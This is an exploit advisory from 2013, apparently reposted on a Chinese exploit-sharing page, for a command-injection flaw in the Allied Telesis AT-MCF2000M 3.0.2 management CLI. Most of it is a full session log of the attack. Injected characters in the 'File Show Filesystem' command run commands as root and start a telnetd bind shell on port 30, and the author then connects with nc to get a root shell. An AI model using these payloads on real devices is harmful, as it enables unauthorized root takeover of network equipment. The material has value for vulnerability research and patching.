扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 |
:::::::-. ...::::::.:::. ;;, <code>';, ;; ;;;</code>;;;;,<code>;;; </code>[[ [[[[' [[[[[[[[. '[[ $$,$$$$$$$$$$ "Y$c$$ 888_,o8P'88.d888888Y88 MMMMP"` "YmmMMMM""MMM YM [ Discovered by dun \ posdub[at]gmail.com ] [ 2013-01-02] #################################################################### #[ Allied Telesis AT-MCF2000M 3.0.2 ] Gaining Root Shell Access# #################################################################### # # Device: "The AT-MCF2000M is the management module for the AT-MCF2000 two-slot chassis. #With the AT-MCF2000M management module, if there is a blade failure, #insertion or removal, your traffic flow will not be interupted.." # # Vendor:http://www.alliedtelesis.com/ # Product: http://www.alliedtelesis.com/p-2265.html # Software Download: ftp://ftp.alliedtelesis.com/pub/medconv/mcf2000/AT-S85_S97_v302.ZIP # ################################################################### # Vulnerability: Logging in system via ssh/telnet, is necessary to using this vulnerability. After logging in, user has access to client menu(/sbin/AtiCli), without access to the shell. User-supplied data are not validated properly. In section "File Show Filesystem=system://0/m/", is possible to inject command with using special characters: "|;&. Commands are limited to max 25 characters. Chars / are filtered. For example: # File Show Filesystem=system://0/m/";echo 11111111111111111111" File name can be only up to 25 alphanumeric characters. <>20:54:16::File Show Filesystem=system://0/m/";echo 11111111111111111111"::DENY(CLI_STRING_LENGTH_OUT_OF_RANGE)::[00.002] # # File Show Filesystem=system://0/m/";ls -al /" <>20:55:00::File Show Filesystem=system://0/m/";ls -al /"::DENY(CLI_INVALID_PARAMETER)::[00.002] Getting root access: root@debian:~# ssh 10.11.200.2 -------------------------------------------------------------------------------- Allied Telesis Media Converter AT-MCF2000 -------------------------------------------------------------------------------- Login: manager Password: ******* Allied Telesis Media Converter- Version 3.0.2 <No System Name> # ? COnfiguration - Configuration related commands DIagnostics - Diagnostics related commands File- File related commands IP- IP related commands Logging - Logging related commands Ntp - Ntp related commands Ping- Ping a host System- System related commands Telnet- Telnet related commands SNMP- Snmp related commands SSh - SSH related commands User- User management commands CLear - Clear the terminalscreen Help- CLI help information EXit- Exit # File Show Filesystem=system://0/m/ Module 0/M File System: -rw-r--r--1 002640 Jan1 15:27 BM_0_1.cfg -rw-r--r--1 002612 Jan1 15:27 BM_0_2.cfg -rw-r--r--1 001355 Jan1 15:27 MM.cfg -rw-r--r--1 00 310 Dec 31 13:17 file.inf -rw-r--r--1 006609 Jan1 15:27 mcf_chassis0.cfg # File Show Filesystem=system://0/m/BM_0_1.cfg Module 0/M File System: -rw-r--r--1 002640 Jan1 15:27 BM_0_1.cfg # File Show Filesystem=system://0/m/test Module 0/M File System: ls: test: No such file or directory <>18:55:19::File Show Filesystem=system://0/m/test::COMPL::[00.052] # File Show Filesystem=system://0/m/|id Module 0/M File System: uid=0 gid=0 # File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30" Module 0/M File System: <>19:00:41::File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"::COMPL::[00.061] # File Show Filesystem=system://0/m/|"ps aux|grep telnet" Module 0/M File System: 25 0 336 S /usr/sbin/telnetd -l /sbin/AtiCli 497 0 192 S telnetd -l/bin/sh -p30 <>19:01:02::File Show Filesystem=system://0/m/|"ps aux|grep telnet"::COMPL::[00.117] # exit <>19:01:40::exit::COMPL::[00.001] # logging out. Connection to 10.11.200.2 closed. root@debian:~# nc 10.11.200.2 30 BusyBox v1.01 (2005.09.07-23:28+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. / # id uid=0 gid=0 / # uname -a Linux (none) 2.6.14 #2 Thu Jul 23 17:15:38 PDT 2009 ppc unknown / # cat /proc/version Linux version 2.6.14 (schen@arun-linux) (gcc version 3.4.4) #2 Thu Jul 23 17:15:38 PDT 2009 / # ls -al drwxr-xr-x 15 1046 1002 1024 Jan1 18:58 . drwxr-xr-x 15 1046 1002 1024 Jan1 18:58 .. -rw-r--r--1 00 125 Jan1 19:10 .ash_history -rw-r--r--1 00 0 Jan1 13:24 1 drwxr-xr-x2 001024 Aug 102009 bin drwxr-xr-x3 00 0 Jan1 15:27 cfg drwxr-xr-x4 002048 Aug 102009 dev drwxr-xr-x 10 001024 Jan11970 etc drwxr-xr-x4 001024 Aug 102009 lib drwxr-xr-x2 00 12288 Aug 102009 lost+found drwxr-xr-x3 001024 Aug 102009 mnt dr-xr-xr-x 49 00 0 Jan11970 proc drwx------2 001024 Aug 102009 root drwxr-xr-x2 001024 Aug 102009 sbin drwxrwxrwt2 001024 Jan1 19:06 tmp drwxr-xr-x6 001024 Aug 102009 usr drwxr-xr-x7 001024 Jan11970 var / # echo pwnd! :) & exit pwnd! :) Connection closed by foreign host. root@debian:~# |
体验盒子
